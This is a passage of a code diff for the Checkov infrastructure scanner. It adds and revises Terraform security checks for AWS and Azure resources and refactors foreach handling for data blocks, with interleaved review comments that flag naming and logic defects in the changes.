CheckResult.FAILED: + return hash_result + + source = conf.get("source") + if source and isinstance(source, list): + source_url = source[0] + if BaseModuleCheck.is_git_source(source_url): + if ("?ref" in source_url or "&ref" in source_url) and re.search(VERSION_PATTERN, source_url): + return CheckResult.PASSED + else: + version = conf.get("version") + if source and isinstance(version, list): + return CheckResult.PASSED + + return CheckResult.FAILED + + +check = RevisionVersionTag() diff --git a/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py new file mode 100644 index 00000000000..24fe3b80b9b --- /dev/null +++ b/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py 
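Review bot: In `scan_module_conf` the guard `("?ref" in source_url or "&ref" in source_url)` is redundant with `VERSION_PATTERN`, which already requires `[?&]ref=`, and the pattern's trailing `.*(\d\.\d).*` accepts a `digit.digit` anywhere after `ref=` — including in a later query parameter — while rejecting single-component tags such as `ref=v2`; anchor the version to the ref value itself, e.g. `VERSION_PATTERN = re.compile(r"[?&]ref=[^&]*\d+\.\d+")` with `if VERSION_PATTERN.search(source_url):`. In the registry branch `isinstance(version, list)` passes an empty list; `if source and version and isinstance(version, list):` is safer. A class docstring should also state why this check is weaker than RevisionHash — a tag can be moved, a commit hash cannot — so users know which of the two to enforce.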
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CloudsearchDomainEnforceHttps(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access"
+ id = "CKV_AWS_366"
+ supported_resources = ["aws_cognito_identity_pool"]
+ categories = [CheckCategories.IAM]
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ )
+
+ def get_inspected_key(self) -> str:
+ return "allow_unauthenticated_identities"
+
+ def get_expected_value(self) -> bool:
+ return False
+
+
+check = CloudsearchDomainEnforceHttps()
diff --git a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
index 56fa9aaa522..d98dd54e218
--- a/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
+++ b/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py
@@ -19,7 +19,7 @@ def scan_resource_conf(self, conf): :return: """ if "transit_encryption_enabled" in conf.keys() and conf["transit_encryption_enabled"][0] \ - and "auth_token" in conf.keys(): + and ("auth_token" in conf.keys() or "user_group_ids" in conf.keys()): return CheckResult.PASSED return CheckResult.FAILED
diff --git a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
index 42cb441b385..7b1ffb6c602
--- a/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
+++ b/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py
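Review bot: The class is named `CloudsearchDomainEnforceHttps` and instantiated under that name on the last line, although the file, check name and id all concern Cognito identity pools; rename both lines to `class CognitoUnauthenticatedIdentities(BaseResourceValueCheck):` and `check = CognitoUnauthenticatedIdentities()` so the registry and any error messages identify the right check. `allow_unauthenticated_identities` defaults to false in the AWS provider, so a resource that omits it is compliant; confirm that `BaseResourceValueCheck` with an expected value of `False` treats the missing key as PASSED and add a fixture without the attribute either way. `__init__` lacks the return annotation the other two methods carry.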
@@ -38,7 +38,8 @@ def check_conditions(statement) -> bool: if any(condition_type in condition for condition_type in string_conditions): for condition_type in string_conditions: if condition_type in condition: - if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc']): + if any(source in condition[condition_type] for source in ['aws:sourceVpce', 'aws:SourceVpc', + 'aws:PrincipalOrgPath', 'aws:userid']): return True # Default fail if none of the above conditions are met diff --git a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py index 70b6d7f5980..a73419f486f 100644 --- a/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py +++ b/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py @@ -5,9 +5,9 @@ class SagemakerDomainEncryptedWithCMK(BaseResourceValueCheck): def __init__(self): - name = "Ensure Sagemaker domain is encrypted by KMS using a customer managed Key (CMK)" + name = "Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)" id = "CKV_AWS_187" - supported_resources = ['aws_sagemaker_domain'] + supported_resources = ['aws_sagemaker_domain', 'aws_sagemaker_notebook_instance'] categories = [CheckCategories.ENCRYPTION] super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) diff --git a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py index d3d86d41151..2249f55ac5b 100644 --- a/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py +++ b/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py 
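Review bot: The IAM global condition key is spelled `aws:PrincipalOrgPaths` (plural); if `condition[condition_type]` is a dict keyed by condition key, the added `'aws:PrincipalOrgPath'` never matches and the intended exemption is dead code. Treating `aws:userid` (or the org-path key) as proof that a `Principal: "*"` statement is scoped is only sound for positive operators — under `StringNotEquals`/`StringNotLike`, which may be among the `string_conditions` defined outside this hunk, the statement still grants everyone except the named value — so the exemption should be limited to the non-negated operators. `check_conditions` begins outside the hunk.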
@@ -21,14 +21,14 @@ def scan_resource_conf(self, conf) -> CheckResult: if site_config.get('application_stack') and isinstance(site_config.get('application_stack'), list): stack = site_config.get('application_stack')[0] if stack.get('dotnet_version') and isinstance(stack.get('dotnet_version'), list): - if stack.get('dotnet_version')[0] == "v7.0": + if stack.get('dotnet_version')[0] == "v8.0": return CheckResult.PASSED return CheckResult.FAILED return CheckResult.UNKNOWN def get_expected_values(self) -> List[str]: - return ["v6.0", "v7.0"] + return ["v6.0", "v8.0"] check = AppServiceDotnetFrameworkVersion() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py new file mode 100644 index 00000000000..7b544f785c2 --- /dev/null +++ b/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py @@ -0,0 +1,21 @@ +from checkov.common.models.consts import ANY_VALUE +from checkov.common.models.enums import CheckCategories +from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck + + +class CognitiveServicesDisablesPublicNetwork(BaseResourceValueCheck): + def __init__(self): + name = "Ensure that Cognitive Services account is not configured with managed identity" + id = "CKV_AZURE_238" + supported_resources = ['azurerm_cognitive_account'] + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self): + return "identity/[0]/type" + + def get_expected_value(self): + return ANY_VALUE + + +check = CognitiveServicesDisablesPublicNetwork() diff --git a/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py new file mode 100644 index 00000000000..31a3604595e --- /dev/null 
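Review bot: `scan_resource_conf` now passes only `dotnet_version == "v8.0"`, while `get_expected_values` advertises `["v6.0", "v8.0"]`, so a resource on `v6.0` is reported FAILED with guidance that lists `v6.0` as acceptable; either compare against the advertised list — `if stack.get('dotnet_version')[0] in self.get_expected_values():` — or drop `v6.0` from it. `scan_resource_conf` begins outside the hunk.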
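Review bot: The check name says the account is *not* configured with managed identity, but `get_expected_value` returns `ANY_VALUE` for `identity/[0]/type`, which passes only when an identity *is* configured; the name should read `name = "Ensure that Cognitive Services accounts are configured with managed identity"` (or the logic inverted, whichever is intended), and the category should be `CheckCategories.IAM` rather than NETWORKING. The class is also named `CognitiveServicesDisablesPublicNetwork` and instantiated as such on the last line although the file is CognitiveServicesConfigureIdentity.py; rename both to `CognitiveServicesConfigureIdentity`. `get_inspected_key` and `get_expected_value` lack the return annotations used by the sibling checks in this commit.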
+++ b/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,25 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure that Cognitive Services accounts enable local authentication"
+ id = "CKV_AZURE_236"
+ supported_resources = ('azurerm_cognitive_account', )
+ categories = (CheckCategories.NETWORKING, )
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ )
+
+ def get_inspected_key(self):
+ return 'local_auth_enabled'
+
+ def get_expected_value(self):
+ return False
+
+
+check = CognitiveServicesEnableLocalAuth()
diff --git a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
index f79c9f79217..357af9c78fd
--- a/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
+++ b/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py
@@ -5,7 +5,7 @@ class DatabricksWorkspaceIsNotPublic(BaseResourceNegativeValueCheck): def __init__(self): - name = "Ensure that databricks workspace is not public" + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" id = "CKV_AZURE_158" supported_resources = ['azurerm_databricks_workspace'] categories = [CheckCategories.NETWORKING]
diff --git a/checkov/terraform/graph_builder/foreach/builder.py b/checkov/terraform/graph_builder/foreach/builder.py
index f19d0b009d5..ffaf7bca36d
--- a/checkov/terraform/graph_builder/foreach/builder.py
+++ b/checkov/terraform/graph_builder/foreach/builder.py
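Review bot: `get_expected_value` returns `False` for `local_auth_enabled`, so the check passes only when local (key-based) authentication is disabled, yet the name reads "enable local authentication"; rename to `name = "Ensure that Cognitive Services accounts disable local authentication"` (keeping `CKV_AZURE_236`), since the control is about turning local keys off in favour of identity-based access. `local_auth_enabled` defaults to true in the azurerm provider, so a resource that omits it is non-compliant — confirm `BaseResourceValueCheck` reports the missing key as FAILED when the expected value is `False`, and cover it with a fixture. `CheckCategories.NETWORKING` does not describe an authentication control; IAM is the matching category.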
@@ -2,6 +2,7 @@ import typing +from checkov.terraform.graph_builder.foreach.data_handler import ForeachDataHandler from checkov.terraform.graph_builder.foreach.module_handler import ForeachModuleHandler from checkov.terraform.graph_builder.foreach.resource_handler import ForeachResourceHandler from checkov.terraform.graph_builder.graph_components.block_types import BlockType @@ -14,12 +15,21 @@ class ForeachBuilder: def __init__(self, local_graph: TerraformLocalGraph): self._resource_handler = ForeachResourceHandler(local_graph) self._module_handler = ForeachModuleHandler(local_graph) + self._data_handler = ForeachDataHandler(local_graph) def handle(self, foreach_blocks: dict[str, list[int]]) -> None: + """ + First Data blocks that Modules can inherit from are handled. + Second, Module blocks are handled. + Last Resource blocks that can be duplicate by the Modules rendering. + """ + if self._data_handler.local_graph.enable_datas_foreach_handling: + if foreach_blocks.get(BlockType.DATA): + self._data_handler.handle(foreach_blocks[BlockType.DATA]) + self._data_handler.local_graph._arrange_graph_data() + self._data_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_modules_foreach_handling: if foreach_blocks.get(BlockType.MODULE): self._module_handler.handle(foreach_blocks[BlockType.MODULE]) - self._module_handler.local_graph._arrange_graph_data() - self._module_handler.local_graph._build_edges() if self._module_handler.local_graph.enable_foreach_handling: self._resource_handler.handle(foreach_blocks.get(BlockType.RESOURCE, [])) diff --git a/checkov/terraform/graph_builder/foreach/data_handler.py b/checkov/terraform/graph_builder/foreach/data_handler.py new file mode 100644 index 00000000000..f5a343471b2 --- /dev/null +++ b/checkov/terraform/graph_builder/foreach/data_handler.py 
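Review bot: `handle` now calls `self._data_handler.local_graph._arrange_graph_data()` and `_build_edges()` — private methods of the graph reached through a handler attribute — while the module handler hunk in this same commit moved the equivalent calls inside its own `handle`; for symmetry the data handler (or `ForeachEntityHandler.handle`) should own the re-arrange/rebuild step so the builder does not touch the graph's internals. The docstring reads awkwardly; suggest `"""Handle data blocks first (modules may depend on them), then module blocks, then resource blocks, which module rendering may have duplicated."""`. The three gates read flags through two different handlers' `local_graph`; since it is one graph, binding it once to a local at the top of `handle` would be clearer.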
@@ -0,0 +1,14 @@
+from __future__ import annotations
+
+from checkov.terraform.graph_builder.graph_components.block_types import BlockType
+from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+ from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
+
+
+class ForeachDataHandler(ForeachEntityHandler):
+ def __init__(self, local_graph: TerraformLocalGraph) -> None:
+ super().__init__(local_graph, BlockType.DATA)
diff --git a/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py
new file mode 100644
index 00000000000..7fc4dc771df
--- /dev/null
+++ b/checkov/terraform/graph_builder/foreach/foreach_entity_handler.py
@@ -0,0 +1,108 @@ +from __future__ import annotations + +import logging +from typing import Any, Optional, TYPE_CHECKING + +from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler +from checkov.terraform.graph_builder.foreach.consts import FOR_EACH_BLOCK_TYPE, FOREACH_STRING, COUNT_STRING +from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock + +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph + + +class ForeachEntityHandler(ForeachAbstractHandler): + def __init__(self, local_graph: TerraformLocalGraph, block_type_to_handle: str) -> None: + super().__init__(local_graph) + self.block_type_to_handle = block_type_to_handle + + def handle(self, resources_blocks: list[int]) -> None: + block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) + self._create_new_resources(block_index_to_statement) + + def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: + if not resources_blocks: + return {} + block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} + for block_index, block in enumerate(self.local_graph.vertices): + if block.block_type != self.block_type_to_handle or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): + continue + foreach_statement = self._get_static_foreach_statement(block_index) + block_index_to_statement[block_index] = foreach_statement + blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] + if blocks_to_render: + rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) + block_index_to_statement.update(rendered_statements) + return block_index_to_statement + + def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: + attributes = 
self.local_graph.vertices[block_index].attributes + if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): + return None + try: + if self._is_static_statement(block_index): + return self._handle_static_statement(block_index) + else: + return None + except Exception as e: + logging.info( + f"Cannot get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") + return None + + def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: + rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} + sub_graph = self._build_sub_graph(blocks_to_render) + self._render_sub_graph(sub_graph, blocks_to_render) + for block_idx in blocks_to_render: + if not self._is_static_statement(block_idx, sub_graph): + rendered_statements_by_idx[block_idx] = None + else: + rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) + return rendered_statements_by_idx + + def _create_new_resources_count(self, statement: int, block_idx: int) -> None: + main_resource = self.local_graph.vertices[block_idx] + for i in range(statement): + self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) + + def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, + new_key: int | str, new_value: int | str) -> None: + self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, foreach_idx=foreach_idx) + + def _create_new_resource( + self, + main_resource: TerraformBlock, + new_value: int | str, + resource_idx: int, + foreach_idx: int, + new_key: int | str | None = None, + ) -> None: + new_resource = pickle_deepcopy(main_resource) + block_type, block_name = new_resource.name.split('.') + key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) + config_attrs = new_resource.config.get(block_type, {}).get(block_name, {}) + + self._update_foreach_attrs(config_attrs, 
key_to_val_changes, new_resource) + idx_to_change = new_key or new_value + self._add_index_to_resource_block_properties(new_resource, idx_to_change) + if foreach_idx == 0: + self.local_graph.vertices[resource_idx] = new_resource + else: + self.local_graph.vertices.append(new_resource) + + @staticmethod + def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: + block_type, block_name = block.name.split('.') + idx_with_separator = ForeachEntityHandler._update_block_name_and_id(block, idx) + if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): + block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) + + def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: + for block_idx, statement in block_index_to_statement.items(): + if not statement: + continue + if isinstance(statement, int): + self._create_new_resources_count(statement, block_idx) + else: + self._create_new_resources_foreach(statement, block_idx) diff --git a/checkov/terraform/graph_builder/foreach/module_handler.py b/checkov/terraform/graph_builder/foreach/module_handler.py index 529d893e4e1..b84d8bc3493 100644 --- a/checkov/terraform/graph_builder/foreach/module_handler.py +++ b/checkov/terraform/graph_builder/foreach/module_handler.py @@ -35,6 +35,8 @@ def handle(self, modules_blocks: list[int]) -> None: while modules_to_render: modules_to_render = self._render_foreach_modules_by_levels(modules_blocks, modules_to_render, current_level) + self.local_graph._arrange_graph_data() + self.local_graph._build_edges() def _render_foreach_modules_by_levels(self, modules_blocks: list[int], modules_to_render: list[int], current_level: list[TFModule | None]) -> list[int]: 
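Review bot: `_get_static_foreach_statement` wraps the whole statement evaluation in `except Exception` and logs at INFO, so a rendering bug in the new data-block path silently degrades to "no statement" and the block is simply never expanded; log with `logging.warning(..., exc_info=True)` or narrow the caught types. `_create_new_resource` and `_add_index_to_resource_block_properties` unpack `name.split('.')` into exactly two parts; that held for resources, but now that the class also serves `BlockType.DATA` vertices, confirm their `name` has the same `type.name` shape or the unpack raises ValueError. `idx_to_change = new_key or new_value` falls through to the value for a falsy key such as `""`; `idx_to_change = new_value if new_key is None else new_key` matches the `new_key: int | str | None` annotation. A class docstring explaining that `block_type_to_handle` selects which vertices this handler expands would orient readers arriving from the two thin subclasses.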
@@ -75,8 +77,16 @@ def _duplicate_module_with_for_each(self, module_idx: int, for_each: dict[str, A def _duplicate_module_with_count(self, module_idx: int, count: int) -> None: self._create_new_resources_count(count, module_idx) + def _get_rendered_modules(self, source_modules: list[TFModule | None]) -> list[int]: + """ + Returns a list of module indexes that have been rendered in the current iteration. + """ + modules_created_by_provided_source_packed = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in source_modules] + modules_created_by_provided_source = list(itertools.chain(*modules_created_by_provided_source_packed)) # list of lists -> single list + return modules_created_by_provided_source + def _get_modules_to_render(self, current_level: list[TFModule | None]) -> list[int]: - rendered_modules = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in current_level][0] + rendered_modules = self._get_rendered_modules(current_level) current_level.clear() for m_idx in rendered_modules: current_level.append(self._get_current_tf_module_object(m_idx)) @@ -190,7 +200,7 @@ def _create_new_module( main_resource_module_key = TFModule( path=new_resource.path, name=main_resource.name, - nested_tf_module=self._get_tf_module_with_no_foreach(new_resource.source_module_object) + nested_tf_module=new_resource.source_module_object ) # Without making this copy the test don't pass, as we might access the data structure in the middle of an update diff --git a/checkov/terraform/graph_builder/foreach/resource_handler.py b/checkov/terraform/graph_builder/foreach/resource_handler.py index 8540d8d12b1..e08101f5634 100644 --- a/checkov/terraform/graph_builder/foreach/resource_handler.py +++ b/checkov/terraform/graph_builder/foreach/resource_handler.py 
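Review bot: `_get_rendered_modules` indexes `self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE]` directly, and `vertices_by_module_dependency` is declared as `defaultdict(partial(defaultdict, list))` in the local_graph.py `__init__` hunk of this same commit, so a lookup for a `curr` that has no modules inserts an empty entry as a side effect of a read; the replaced one-liner had the same behaviour, but this helper now runs it for every source module instead of the first. Prefer a non-inserting lookup, `packed = (self.local_graph.vertices_by_module_dependency.get(curr, {}).get(BlockType.MODULE, []) for curr in source_modules)` followed by `return list(itertools.chain.from_iterable(packed))`, which also drops the star-unpacking of a list of lists. The docstring could add that the result preserves the order of `source_modules`, since `_get_modules_to_render` rebuilds `current_level` from it.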
@@ -1,110 +1,15 @@ from __future__ import annotations -import logging -import typing -from typing import Any, Optional - -from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.terraform.graph_builder.graph_components.block_types import BlockType -from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler -from checkov.terraform.graph_builder.foreach.consts import FOREACH_STRING, COUNT_STRING, FOR_EACH_BLOCK_TYPE -from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock - -if typing.TYPE_CHECKING: - from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - - -class ForeachResourceHandler(ForeachAbstractHandler): - def __init__(self, local_graph: TerraformLocalGraph) -> None: - super().__init__(local_graph) - - def handle(self, resources_blocks: list[int]) -> None: - block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks) - self._create_new_resources(block_index_to_statement) +from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler - def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE: - if not resources_blocks: - return {} - block_index_to_statement: FOR_EACH_BLOCK_TYPE = {} - for block_index, block in enumerate(self.local_graph.vertices): - if block.block_type != BlockType.RESOURCE or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes): - continue - foreach_statement = self._get_static_foreach_statement(block_index) - block_index_to_statement[block_index] = foreach_statement - blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None] - if blocks_to_render: - rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render) - block_index_to_statement.update(rendered_statements) - return block_index_to_statement +from typing import TYPE_CHECKING - def 
_get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]: - attributes = self.local_graph.vertices[block_index].attributes - if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING): - return None - try: - if self._is_static_statement(block_index): - return self._handle_static_statement(block_index) - else: - return None - except Exception as e: - logging.info( - f"Cant get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}") - return None - - def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE: - rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {} - sub_graph = self._build_sub_graph(blocks_to_render) - self._render_sub_graph(sub_graph, blocks_to_render) - for block_idx in blocks_to_render: - if not self._is_static_statement(block_idx, sub_graph): - rendered_statements_by_idx[block_idx] = None - else: - rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph) - return rendered_statements_by_idx - - def _create_new_resources_count(self, statement: int, block_idx: int) -> None: - main_resource = self.local_graph.vertices[block_idx] - for i in range(statement): - self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i) - - def _create_new_resource( - self, - main_resource: TerraformBlock, - new_value: int | str, - resource_idx: int, - foreach_idx: int, - new_key: int | str | None = None, - ) -> None: - new_resource = pickle_deepcopy(main_resource) - block_type, block_name = new_resource.name.split('.') - key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key) - config_attrs = new_resource.config.get(block_type, {}).get(block_name, {}) - - self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource) - idx_to_change = new_key or new_value - self._add_index_to_resource_block_properties(new_resource, idx_to_change) - if foreach_idx == 
0: - self.local_graph.vertices[resource_idx] = new_resource - else: - self.local_graph.vertices.append(new_resource) +if TYPE_CHECKING: + from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph - def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock, - new_key: int | str, new_value: int | str) -> None: - self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, - foreach_idx=foreach_idx) - @staticmethod - def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None: - block_type, block_name = block.name.split('.') - idx_with_separator = ForeachResourceHandler._update_block_name_and_id(block, idx) - if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name): - block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name) +class ForeachResourceHandler(ForeachEntityHandler): - def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None: - for block_idx, statement in block_index_to_statement.items(): - if not statement: - continue - if isinstance(statement, int): - self._create_new_resources_count(statement, block_idx) - else: - self._create_new_resources_foreach(statement, block_idx) + def __init__(self, local_graph: TerraformLocalGraph) -> None: + super().__init__(local_graph, BlockType.RESOURCE) diff --git a/checkov/terraform/graph_builder/graph_components/module.py b/checkov/terraform/graph_builder/graph_components/module.py index 8b67f9cb1e4..76231fb7ece 100644 --- a/checkov/terraform/graph_builder/graph_components/module.py +++ b/checkov/terraform/graph_builder/graph_components/module.py 
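Review bot: The rewritten `ForeachResourceHandler` has no docstring, and since every method it used to own moved to `ForeachEntityHandler`, a reader now lands on a two-line class with no hint of what distinguishes it from the other handlers. Suggest `"""Foreach/count expansion for `resource` blocks; the shared logic lives in ForeachEntityHandler, this subclass only fixes the block type."""` on the class. The `__init__` override exists solely to pass `BlockType.RESOURCE`; if `ForeachEntityHandler` grows more constructor parameters this override will need to mirror them, so a comment saying the signature is intentionally narrowed would help.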
@@ -7,6 +7,7 @@ from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy +from checkov.terraform import TFDefinitionKey from checkov.terraform.graph_builder.graph_components.block_types import BlockType from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock from checkov.terraform.parser_functions import handle_dynamic_values @@ -34,6 +35,7 @@ def __init__( self.resources_types: Set[str] = set() self.source_dir = source_dir self.render_dynamic_blocks_env_var = os.getenv('CHECKOV_RENDER_DYNAMIC_MODULES', 'True') + self.temp_tf_definition: dict[TFDefinitionKey, dict[str, Any]] = {} def __eq__(self, other: object) -> bool: if not isinstance(other, Module): diff --git a/checkov/terraform/graph_builder/local_graph.py b/checkov/terraform/graph_builder/local_graph.py index 877fb876f94..a9560feb947 100644 --- a/checkov/terraform/graph_builder/local_graph.py +++ b/checkov/terraform/graph_builder/local_graph.py @@ -6,7 +6,7 @@ from collections import defaultdict from functools import partial from pathlib import Path -from typing import List, Optional, Union, Any, Dict, overload, TypedDict +from typing import List, Optional, Union, Any, Dict, overload, TypedDict, cast import checkov.terraform.graph_builder.foreach.consts from checkov.common.graph.graph_builder import Edge @@ -15,6 +15,7 @@ from checkov.common.graph.graph_builder.local_graph import LocalGraph from checkov.common.graph.graph_builder.utils import calculate_hash, join_trimmed_strings, filter_sub_keys from checkov.common.runners.base_runner import strtobool +from checkov.common.typing import TFDefinitionKeyType from checkov.common.util.data_structures_utils import pickle_deepcopy from checkov.common.util.type_forcers import force_int from checkov.terraform.graph_builder.foreach.builder import ForeachBuilder 
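Review bot: `Module.temp_tf_definition` is annotated `dict[TFDefinitionKey, dict[str, Any]]`, but the tf_parser.py hunks in this same commit declare `self.temp_tf_definition: dict[str, Any]` on the parser and assign it into the module with `# type:ignore # will be TFDefinitionKey and not string`, so the two declarations disagree and the mismatch is suppressed rather than resolved. Pick one key type (the comment suggests `TFDefinitionKey`) and annotate both sides the same, so mypy can check the consumer in `TerraformLocalGraph._add_provider_attr_to_resources`, which indexes this dict with `TFDefinitionKey` instances. A one-line attribute comment would also help, e.g. `# parser output per definition key, consumed by TerraformLocalGraph when resolving resource providers`; the `temp_` prefix suggests the data is transient, but nothing in the diff clears it.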
@@ -31,9 +32,11 @@ attribute_has_nested_attributes, remove_index_pattern_from_str, join_double_quote_surrounded_dot_split, ) -from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key +from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key, \ + get_sanitized_terraform_resource_id from checkov.terraform.graph_builder.utils import is_local_path -from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer +from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer, \ + LEFT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET_WITH_QUOTATION, LEFT_BRACKET, RIGHT_BRACKET, DOLLAR_PREFIX, RIGHT_CURLY, LEFT_CURLY from checkov.common.util.consts import RESOLVED_MODULE_ENTRY_NAME MODULE_RESERVED_ATTRIBUTES = ("source", "version") @@ -66,7 +69,8 @@ def __init__(self, module: Module) -> None: self.vertices_by_module_dependency: Dict[TFModule | None, Dict[str, List[int]]] = defaultdict(partial(defaultdict, list)) self.enable_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_FOREACH_HANDLING', 'True')) self.enable_modules_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_MODULES_FOREACH_HANDLING', 'True')) - self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: []} + self.enable_datas_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False')) + self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: 